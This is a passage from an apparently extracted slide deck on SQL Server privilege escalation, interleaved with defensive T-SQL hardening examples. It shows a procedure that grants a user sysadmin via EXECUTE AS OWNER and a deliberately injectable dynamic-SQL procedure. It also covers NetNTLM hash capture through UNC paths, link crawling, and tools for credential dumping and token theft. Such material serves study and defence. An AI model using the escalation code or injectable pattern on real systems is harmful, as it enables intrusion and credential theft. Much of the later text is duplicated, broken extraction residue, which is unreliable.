• Limits the commands and queries that run elevated
• Don't have to grant IMPERSONATE
Cons
• No granular control over the database owner's privileges
• The db_owner role can EXECUTE AS OWNER of the database, which is often a sysadmin
• Requires the database to be configured as TRUSTWORTHY for OS command execution
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
Escalating Privileges: Impersonation - Stored Procedure and Trigger Creation Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
• The db_owner role can impersonate the actual database owner
  USE MyAppDb
  GO
  CREATE PROCEDURE sp_escalate_me
  WITH EXECUTE AS OWNER
  AS
  EXEC sp_addsrvrolemember 'MyAppUser','sysadmin'
  GO
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation Injection Issues
• Use signed procedures
  o Create stored procedure
  o Create a database master key
  o Create a certificate
  o Create a login from the certificate
  o Configure login privileges
  o Sign stored procedure with certificate
  o GRANT EXECUTE to user
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as trustworthy for OS command execution
Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions

Escalating Privileges: Impersonation
SQL Injection Example

    CREATE PROCEDURE sp_sqli2
    @DbName varchar(max)
    AS
    BEGIN
    DECLARE @query AS varchar(max)
    -- @DbName is concatenated straight into the dynamic query: this is the injection point
    SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%'+ @DbName+'%'' OR name=''tempdb''';
    EXECUTE(@query)
    END
    GO
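The sp_sqli2 procedure above concatenates its parameter into dynamic SQL. Inside a signed procedure that is exactly the condition the Cons bullets describe: whatever is injected runs with the certificate login's rights, not the caller's. The following is an added example, not code from the deck or from PowerUpSQL, that rewrites the procedure with parameterized dynamic SQL and then walks the seven signing steps from the slide. The database name AppDb, the certificate and login names, the user app_user, the file path and the password are placeholders.

```sql
-- Added example (not from the deck or PowerUpSQL). Placeholders: AppDb, cert_dbquery,
-- cert_dbquery_login, app_user, the file path and the master key password.
USE AppDb;
GO
-- Step 1: create the stored procedure. The caller's value is bound as a parameter of
-- sp_executesql, so a value such as  x' OR 1=1--  only changes the LIKE pattern and can
-- never change the statement.
CREATE PROCEDURE dbo.sp_sqli2_fixed
    @DbName sysname            -- database names are sysname, not varchar(max)
AS
BEGIN
    SET NOCOUNT ON;
    DECLARE @query nvarchar(max) =
        N'SELECT name FROM sys.databases '
      + N'WHERE name LIKE N''%'' + @pattern + N''%'' OR name = N''tempdb'';';
    EXEC sys.sp_executesql @query, N'@pattern sysname', @pattern = @DbName;
END
GO
-- Step 2: database master key, which protects the certificate's private key.
CREATE MASTER KEY ENCRYPTION BY PASSWORD = '<placeholder-strong-password>';
GO
-- Step 3: the certificate that will carry the procedure's extra rights.
CREATE CERTIFICATE cert_dbquery WITH SUBJECT = 'Signs dbo.sp_sqli2_fixed';
GO
-- Step 4: a login mapped to the certificate. Logins live in master, so the public
-- part of the certificate is copied there first (BACKUP CERTIFICATE writes only the
-- public key when no private key clause is given).
BACKUP CERTIFICATE cert_dbquery TO FILE = 'C:\placeholder\cert_dbquery.cer';
GO
USE master;
GO
CREATE CERTIFICATE cert_dbquery FROM FILE = 'C:\placeholder\cert_dbquery.cer';
CREATE LOGIN cert_dbquery_login FROM CERTIFICATE cert_dbquery;
GO
-- Step 5: configure login privileges: only what the procedure needs. On a hardened
-- server where VIEW ANY DATABASE has been revoked from public, callers otherwise see
-- just the databases they own. No sysadmin, no IMPERSONATE.
GRANT VIEW ANY DATABASE TO cert_dbquery_login;
GO
USE AppDb;
GO
-- Step 6: sign the procedure. While it executes, the certificate login's permissions
-- are added to the caller's; outside the procedure the caller gains nothing.
ADD SIGNATURE TO dbo.sp_sqli2_fixed BY CERTIFICATE cert_dbquery;
GO
-- Step 7: let the low-privileged user call it.
GRANT EXECUTE ON dbo.sp_sqli2_fixed TO app_user;
GO
-- Check from the user's point of view: the quote in the second call stays inside
-- the LIKE pattern, so it matches no database name instead of widening the query.
EXECUTE AS USER = 'app_user';
EXEC dbo.sp_sqli2_fixed @DbName = N'master';
EXEC dbo.sp_sqli2_fixed @DbName = N'x'' OR 1=1--';
REVERT;
```

Altering the procedure later drops the signature, so ADD SIGNATURE has to be part of every deployment script; a signed procedure that silently lost its signature fails with a permission error rather than running unsigned, which is the safe direction.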
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands.
2. OS commands run as the SQL Server service account.
3. Service accounts have sysadmin privileges by default.
4. Companies often use a single domain account to run hundreds of SQL Servers.
5. So if you get sysadmin on one server, you have it on all of them.
One account to rule them all.

[Figure: Leveraging Shared MS SQL Server Service Accounts (four frames). Zones: Internet, DMZ (ports 80 and 443), Intranet (ports 1433 and 1434). Nodes: LVA (two instances), HVA, ADS. Key: HVA = High Value Application, LVA = Low Value Application. Step 1: SQL injection against the LVA by "Captain Evil" (PURE EVIL). Step 2: Execute local command via xp_cmdshell. Step 3: Access to the HVA with the shared domain service account; execute commands and gather data from other database servers via osql.]
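The shared-account condition in the list above can be found from the defender's side with a per-instance inventory. The following is an added example, not from the deck or from PowerUpSQL: the first query runs on one instance and reports the engine's Windows identity, its kind, and whether it holds sysadmin; the second shows the reuse check once those rows from every instance have been gathered into one table (the inventory rows and instance names below are constructed). sys.dm_server_services needs SQL Server 2008 R2 SP1 or later and STRING_AGG needs 2017 or later.

```sql
-- Added example (not from the deck or PowerUpSQL).
-- Part 1: run on each instance and collect the output centrally.
SELECT @@SERVERNAME AS instance_name,
       s.servicename,
       s.service_account,
       CASE
           WHEN s.service_account LIKE N'NT SERVICE\%'   THEN N'virtual account: unique per machine'
           WHEN s.service_account LIKE N'NT AUTHORITY\%' THEN N'built-in account: unique per machine'
           WHEN s.service_account LIKE N'%$'             THEN N'managed service account: cannot be reused by hand'
           ELSE N'domain or local user: check for reuse across instances'
       END AS account_kind,
       -- the service identity's own sysadmin membership (NULL means no matching login)
       ISNULL(IS_SRVROLEMEMBER('sysadmin', s.service_account), 0) AS is_sysadmin
FROM sys.dm_server_services AS s
WHERE s.servicename LIKE N'SQL Server (%';   -- database engine service only, not Agent/Browser
GO

-- Part 2: reuse check over the collected rows. Constructed sample: three instances,
-- two of them running as the same domain account.
DECLARE @inventory TABLE (instance_name sysname, service_account nvarchar(256), is_sysadmin bit);
INSERT INTO @inventory VALUES
    (N'SQL01', N'CORP\svc_sql_prod',       1),
    (N'SQL02', N'CORP\svc_sql_prod',       1),
    (N'SQL03', N'NT Service\MSSQLSERVER',  1);

-- One row per account used on more than one instance: sysadmin on one of the listed
-- instances means sysadmin on all of them, which is the risk the slide describes.
SELECT service_account,
       COUNT(*)                             AS instance_count,
       STRING_AGG(instance_name, N', ')     AS instances
FROM @inventory
WHERE service_account NOT LIKE N'NT SERVICE\%'
  AND service_account NOT LIKE N'NT AUTHORITY\%'
  AND service_account NOT LIKE N'%$'
GROUP BY service_account
HAVING COUNT(*) > 1;
```

The reuse query deliberately ignores virtual accounts, built-in accounts and managed service accounts: those identities cannot be shared across machines, so a result row is always a hand-managed domain or local account that has been configured on several instances.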
Escalating Privileges: Crawling Server Links
What's a database link?
Database links are basically persistent database connections for SQL Servers.
Why should I care?
Short answer = privilege escalation
• Public role can use links to execute queries on remote servers (impersonation)
  SELECT * FROM OpenQuery([SQLSERVER2], 'SELECT @@Version')
• Stored procedures can be executed (xp_cmdshell)
• Links can be crawled
[Figure: Leveraging MS SQL Database links (five frames). Zones: Internet, DMZ (ports 80 and 443), Intranet (ports 1433 and 1434). Nodes: LVA (DB1), HVA, ADS. Key: HVA = High Value Application, LVA = Low Value Application. Step 1: SQL injection against the LVA by "Captain Evil" (PURE EVIL); from DB1 a DB link with least privileges, then a DB link with the SA account. Step 2: Execute SQL queries and local commands on database servers via nested linked services.]

Escalating Privileges: Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50% of environments we've seen.
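What makes a link crawlable with more rights than the caller has is visible in the catalog: a login mapping that applies to every local login and uses a fixed remote login (the "DB link with SA account" in the figure), and RPC OUT, which is what lets stored procedures such as xp_cmdshell run over the link. The following is an added example, not from the deck or from PowerUpSQL, that lists every link on the instance with its mappings and a finding per mapping, then shows the remediation for the slide's SQLSERVER2 link. The local login report_user, the remote login report_reader and the password are placeholders.

```sql
-- Added example (not from the deck or PowerUpSQL): linked-server audit for one instance.
SELECT s.name                                   AS link_name,
       s.data_source,
       s.is_rpc_out_enabled,                    -- 1: EXEC ... AT link works, remote procedures can run
       s.is_data_access_enabled,                -- 1: OPENQUERY / four-part names work
       ISNULL(lp.name, N'<all local logins>')   AS local_login,   -- principal_id 0 = default mapping
       ll.uses_self_credential,                 -- 1: the caller's own credentials are forwarded
       ll.remote_name,                          -- fixed remote login for this mapping, if any
       CASE
           WHEN ll.local_principal_id = 0 AND ll.uses_self_credential = 0 AND ll.remote_name IS NOT NULL
               THEN N'HIGH: every local login, public included, reaches the remote as ' + ll.remote_name
           WHEN ll.uses_self_credential = 0 AND ll.remote_name IS NULL
               THEN N'OK: this mapping refuses the connection'
           WHEN ll.uses_self_credential = 1
               THEN N'INFO: caller''s own credentials are forwarded (Windows logins need delegation)'
           ELSE N'INFO: only this local login is mapped, to remote login ' + ll.remote_name
       END AS finding
FROM sys.servers AS s
JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS lp ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;
GO

-- Remediation for a HIGH finding on the slide's SQLSERVER2 link: drop the default
-- all-logins mapping (logins without a mapping are then refused), map only the login
-- that needs the link to a low-privileged remote login, and disable RPC OUT unless
-- remote procedure calls are actually required.
EXEC sys.sp_droplinkedsrvlogin @rmtsrvname = N'SQLSERVER2', @locallogin = NULL;
EXEC sys.sp_addlinkedsrvlogin @rmtsrvname  = N'SQLSERVER2',
                              @useself     = N'false',
                              @locallogin  = N'report_user',            -- placeholder
                              @rmtuser     = N'report_reader',          -- placeholder, not sa
                              @rmtpassword = N'<placeholder-password>';
EXEC sys.sp_serveroption @server = N'SQLSERVER2', @optname = N'rpc out', @optvalue = N'false';
```

A HIGH finding whose remote_name is sa is the worst case on the figure: every member of public on this instance is sysadmin on the remote, and the remote's own links extend the chain. Run the audit on each server reached this way rather than only on the first one.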
Escalating Privileges: UNC Path Injection
UNC paths are used for accessing remote file servers, like so: \\192.168.1.4\file
Almost all procedures that accept a file path in SQL Server support UNC paths.
UNC paths can be used to force the SQL Server service account to authenticate to an attacker.
An attacker can then capture the NetNTLM password hash and crack or relay it.
Relay becomes pretty easy when you know which SQL Servers are using shared accounts.

Oh yeah…
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path: xp_dirtree, xp_fileexists

So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default.

But who really has PUBLIC role access?
Oh yeah, a ton of domain users.

Escalating Privileges: DEMO
Get-SQLServiceAccountPwHashes
…what? It's self descriptive.
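The default that the slides rely on is a plain EXECUTE grant to public on the two procedures named above, and it can be both found and removed from the catalog. The following is an added example, not from the deck or from PowerUpSQL: it lists the grant, revokes it, and confirms from a low-privileged login's point of view that the procedures are no longer callable. The login lowpriv_login is a placeholder for any non-sysadmin login.

```sql
-- Added example (not from the deck or PowerUpSQL). Run in master, where the
-- extended procedures and their permissions live.
USE master;
GO
-- Which of the two path-accepting procedures can public still execute?
SELECT o.name AS procedure_name,
       dp.state_desc,
       dp.permission_name
FROM sys.database_permissions AS dp
JOIN sys.all_objects         AS o  ON o.object_id    = dp.major_id
JOIN sys.database_principals AS pr ON pr.principal_id = dp.grantee_principal_id
WHERE pr.name = N'public'
  AND dp.permission_name = N'EXECUTE'
  AND o.name IN (N'xp_dirtree', N'xp_fileexists');
GO
-- Remove the default grants. Members of sysadmin are unaffected; no other login
-- keeps access unless it is granted explicitly.
REVOKE EXECUTE ON OBJECT::dbo.xp_dirtree    FROM public;
REVOKE EXECUTE ON OBJECT::dbo.xp_fileexists FROM public;
GO
-- Verify as a non-sysadmin login (placeholder name): both columns are 0 after the revoke.
EXECUTE AS LOGIN = 'lowpriv_login';
SELECT HAS_PERMS_BY_NAME('master.dbo.xp_dirtree',    'OBJECT', 'EXECUTE') AS can_exec_dirtree,
       HAS_PERMS_BY_NAME('master.dbo.xp_fileexists', 'OBJECT', 'EXECUTE') AS can_exec_fileexists;
REVERT;
```

The slide says "at least" two procedures, so extend the IN list to every procedure that takes a path on the instance's version before treating the audit as complete, and test non-admin tooling that browses files through these procedures (backup and restore dialogs, for instance) after the revoke. Removing the grant closes the default route to the service account's NetNTLM hash; it does not change the fact that a sysadmin can still supply a UNC path, which is why the shared-account findings above matter independently.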
Escalating Privileges: OS Admin to SysAdmin
Two things to know…
1. Different SQL Server versions can be abused in different ways.
2. All SQL Server versions provide the service account with sysadmin privileges.

Approach              2000  2005  2008  2012  2014  2016
LSA Secrets            x     x     x     x     x     x
Local Administrator    x     x
LocalSystem            x     x     x
Process Migration      x     x     x     x     x     x
Token Stealing         x     x     x     x     x     x
Single User Mode       marked for five of the six versions (the extracted slide does not preserve which one is excluded)

Below are some options for leveraging that knowledge.

Here are some tool options:
Approach → Common Tools
• Access as Local Administrator: Management Studio, sqlcmd, and other native SQL client tools
• Access as LocalSystem: Psexec, accessibility options, debugger with native SQL client tools
• Recover SQL Server service account password from LSA Secrets: Mimikatz, Metasploit lsadump
• Inject shellcode or DLL into the SQL Server service process: Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
• Steal authentication token from SQL Server service process: Metasploit Incognito, Invoke-TokenManipulation
• Single User Mode: DBATools
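The "Local Administrator" and "LocalSystem" rows of the version table correspond to two logins that older versions placed in sysadmin by default and that in-place upgrades carry forward, so an instance running a current version can still have either. The following is an added example, not from the deck or from PowerUpSQL, that lists every sysadmin member, flags those two, and removes them where they are present; ALTER SERVER ROLE needs SQL Server 2012 or later.

```sql
-- Added example (not from the deck or PowerUpSQL): who is sysadmin on this instance,
-- with the two machine-wide identities from the version table called out first.
SELECT m.name        AS login_name,
       m.type_desc,
       m.is_disabled,                        -- a disabled login in sysadmin is still a finding
       CASE m.name
           WHEN N'BUILTIN\Administrators' THEN N'every local Administrators member is sysadmin (SQL 2000/2005 default)'
           WHEN N'NT AUTHORITY\SYSTEM'    THEN N'anything running as LocalSystem is sysadmin (SQL 2000-2008 default)'
           ELSE N''
       END AS finding
FROM sys.server_role_members AS rm
JOIN sys.server_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals   AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = N'sysadmin'
ORDER BY CASE WHEN m.name IN (N'BUILTIN\Administrators', N'NT AUTHORITY\SYSTEM') THEN 0 ELSE 1 END,
         m.name;
GO

-- Remediation: take the two legacy memberships away only where they exist. The
-- service account and named DBA logins keep sysadmin; local admins and LocalSystem
-- processes no longer inherit it.
IF IS_SRVROLEMEMBER('sysadmin', 'BUILTIN\Administrators') = 1
    ALTER SERVER ROLE sysadmin DROP MEMBER [BUILTIN\Administrators];
IF IS_SRVROLEMEMBER('sysadmin', 'NT AUTHORITY\SYSTEM') = 1
    ALTER SERVER ROLE sysadmin DROP MEMBER [NT AUTHORITY\SYSTEM];
GO
```

This covers only the two table rows that are a matter of SQL Server configuration. The LSA Secrets, process migration, token stealing and single-user-mode rows apply to every version because they act on the service process or the host, so the countermeasure for those is limiting who is a local administrator on the database host rather than anything inside the instance.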
Common Post Exploitation Activities
Post Exploitation Overview
1. Establish Persistence
   • SQL Server layer: startup procedures, agent jobs, triggers, modified code
   • OS layer: registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
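The Luhn formula in step 2 is the same check a data-discovery scan uses to separate real card numbers from other long digit strings, which is why a pattern match alone produces many false positives. The following is an added example, not from the deck or from PowerUpSQL: a T-SQL Luhn function and a scan over a small constructed sample, with a cheap LIKE pattern as the first filter and the checksum as the second.

```sql
-- Added example (not from the deck or PowerUpSQL): Luhn checksum as a scalar function.
CREATE FUNCTION dbo.fn_luhn_valid (@candidate nvarchar(64))
RETURNS bit
AS
BEGIN
    -- Keep digits only, so '4111 1111 1111 1111' and '4111-1111-1111-1111' are both tested.
    DECLARE @digits nvarchar(64) = N'', @i int = 1;
    WHILE @i <= LEN(@candidate)
    BEGIN
        IF SUBSTRING(@candidate, @i, 1) LIKE N'[0-9]'
            SET @digits += SUBSTRING(@candidate, @i, 1);
        SET @i += 1;
    END
    -- Card numbers are 13 to 19 digits; anything else cannot be one.
    IF LEN(@digits) < 13 OR LEN(@digits) > 19 RETURN 0;

    -- Luhn: walking from the right, double every second digit, subtract 9 when the
    -- doubled value exceeds 9, sum everything; valid when the sum is divisible by 10.
    DECLARE @sum int = 0, @pos int = LEN(@digits), @double bit = 0, @d int;
    WHILE @pos >= 1
    BEGIN
        SET @d = CAST(SUBSTRING(@digits, @pos, 1) AS int);
        IF @double = 1
        BEGIN
            SET @d = @d * 2;
            IF @d > 9 SET @d -= 9;
        END
        SET @sum += @d;
        SET @double = CASE WHEN @double = 1 THEN 0 ELSE 1 END;
        SET @pos -= 1;
    END
    RETURN CASE WHEN @sum % 10 = 0 THEN 1 ELSE 0 END;
END
GO

-- Constructed sample rows standing in for data sampled from a column.
DECLARE @samples TABLE (col_name sysname, value nvarchar(64));
INSERT INTO @samples VALUES
    (N'customer_note', N'4111 1111 1111 1111'),   -- Visa test number
    (N'customer_note', N'5500-0000-0000-0004'),   -- Mastercard test number
    (N'customer_note', N'4111 1111 1111 1112'),   -- last digit altered
    (N'order_ref',     N'1234567890123456');      -- 16 digits, but not a card number

-- First filter: a cheap pattern for "two runs of four digits". Second filter: the checksum.
SELECT col_name, value, dbo.fn_luhn_valid(value) AS luhn_valid
FROM @samples
WHERE value LIKE N'%[0-9][0-9][0-9][0-9]%[0-9][0-9][0-9][0-9]%'
ORDER BY luhn_valid DESC, col_name;
```

The two test numbers pass and the other two rows fail, which is the point of the second filter: the order reference has the right length and shape, and only the checksum excludes it. A production scan would apply the function to a TABLESAMPLE of each candidate column rather than to every row.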
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
